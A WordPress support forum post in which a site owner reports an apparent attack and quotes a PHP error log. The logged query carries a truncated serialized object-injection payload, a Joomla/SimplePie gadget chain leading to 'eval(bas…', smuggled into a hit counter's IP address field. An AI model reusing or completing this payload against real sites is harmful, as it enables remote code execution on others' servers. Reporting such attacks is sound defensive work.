SQL injection vulnerability
-
Our php error log shows some kind of SQL injection vulnerability.
“[25-Oct-2017 07:56:15 UTC] WordPress database error Illegal mix of collations (utf8_general_ci,IMPLICIT) and (utf8mb4_unicode_ci,COERCIBLE) for operation ‘=’ for query SELECT COUNT(
hit_id
) AS ct FROMahc_hits
WHERE DATE(hit_date
) = DATE(NOW()) ANDhit_ip_address
= ‘}__test|O:21:\\\”JDatabaseDriverMysqli\\\”:3:{s:2:\\\”fc\\\”;O:17:\\\”JSimplepieFactory\\\”:0:{}s:21:\\\”\\\\0\\\\0\\\\0disconnectHandlers\\\”;a:1:{i:0;a:2:{i:0;O:9:\\\”SimplePie\\\”:5:{s:8:\\\”sanitize\\\”;O:20:\\\”JDatabaseDriverMysql\\\”:0:{}s:8:\\\”feed_url\\\”;s:6448:\\\”eval(bas …”I truncated the error.
You can see here that they’ve somehow replaced the ‘hit ip address’ variable with code.
Can you fix this asap?
Thanks!
- The topic ‘SQL injection vulnerability’ is closed to new replies.